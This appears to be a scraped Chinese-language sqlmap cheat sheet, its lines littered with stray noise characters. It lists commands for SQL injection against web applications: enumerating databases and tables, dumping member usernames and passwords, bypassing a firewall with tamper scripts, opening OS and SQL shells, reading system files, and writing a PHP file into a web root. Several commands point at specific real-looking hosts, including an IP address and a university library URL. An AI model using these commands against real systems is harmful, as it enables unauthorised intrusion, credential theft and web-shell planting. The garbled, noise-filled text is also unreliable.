sqlmap使用实例

admin

/pentest/database/sqlmap
9 A: K$ N6 K% z& ~( l2 P
update :::::>     in the folder   after  execute    following   order : svn update

3 w3 y9 ]+ _! c1 m) U2 N+ K- isqlmap.py -r 1.txt --current-db
4 J$ P( \  S5 f. x9 N
. u/ Q4 ^9 b8 V3 Dv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
6 g) S1 f/ n/ h  x7 k' k
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
猜解数据库
: q' n2 t, i3 s./sqlmap.py -u "injection-url" --dbs
! I) }9 x: R: D# Lsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
' d) m9 D* Z. A
猜解表名
' d) p6 E1 f) t9 A* w" l./sqlmap.py -u "injection-url" -D database_name --tables
; a$ p8 q( a$ _
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"

sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump

sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
/ O  l8 o' b8 G; o0 `sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"

6 M3 n% ~9 |- }' `% lsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
7 T. Y7 n1 |# v: Q4 H1 Qsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
' z1 q9 B* f+ z9 y3 o
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"

; K# B% b; ^. m9 W- F( ^/ x5 }5 x) Rsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
猜解列名
& b4 |9 p& s7 f0 E./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
: i+ [' g, l' J2 Z8 d2 t0 J/ g9 R
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
  l+ T; y: y7 |6 g  l- {& ?" dsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
  M( A  E/ S' P. x, b
( ~! z5 ]: u2 F' d/ M4 Hsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
) N; e* H% w, s7 N7 S! e2 H&submit=Go
猜解值
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
! S# ~+ Y& K+ f- h. n2 t========================================================
* e8 ?: k% ?  e& r" t8 m. E搜索表名中包括mana字符的
/sqlmap.py -u "injection-url" -T mana --search
+ v5 W$ x; O3 {& K/ f& E2 J返回一个交互式sql shell
/sqlmap.py -u "injection-url" --sql-shell
( K8 v; y) J* t- U5 I0 N' r读取指定文件（需权限）
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
8 T% X6 a' U; o9 y7 X/ m+ G" j查看当前 用户 及 数据库
/sqlmap.py -u "injection-url" --current-user --current-db
本地文件 写入 远程目标绝对路径
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
, B* M2 t7 @$ U* nsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"

! ]7 v; t) V- u3 dsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
7 K+ U, c$ d  _6 X查看某用的权限
/sqlmap.py -u "injection-url" --privileges -U root
查看当前用户是否为dba
/sqlmap.py -u "injection-url" --is-dba
读取所有数据库用户或指定数据库用户的密码
8 b# b% R7 D$ G6 ]: K7 i2 lsqlmap.py -r 1.txt --users --passwords
* N+ K' i0 J& G4 g7 Psqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
  ?4 j/ Y5 x6 X- n5 X: J
) e% W+ G7 ~' I# U: R0 B. _/sqlmap.py -u "injection-url" --passwords -U root
/ s+ M* r$ R5 W2 V$ W+ Y
--start&&--stop 与 --first&&--last 的区别
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）
- {2 Q* o; d+ E7 M3 v
从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
+ B, h6 J- I0 Q( b/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
  E) L1 g5 L4 q; v8 E
执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
5 Q8 a/ R$ u7 ?8 |0 v: f/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"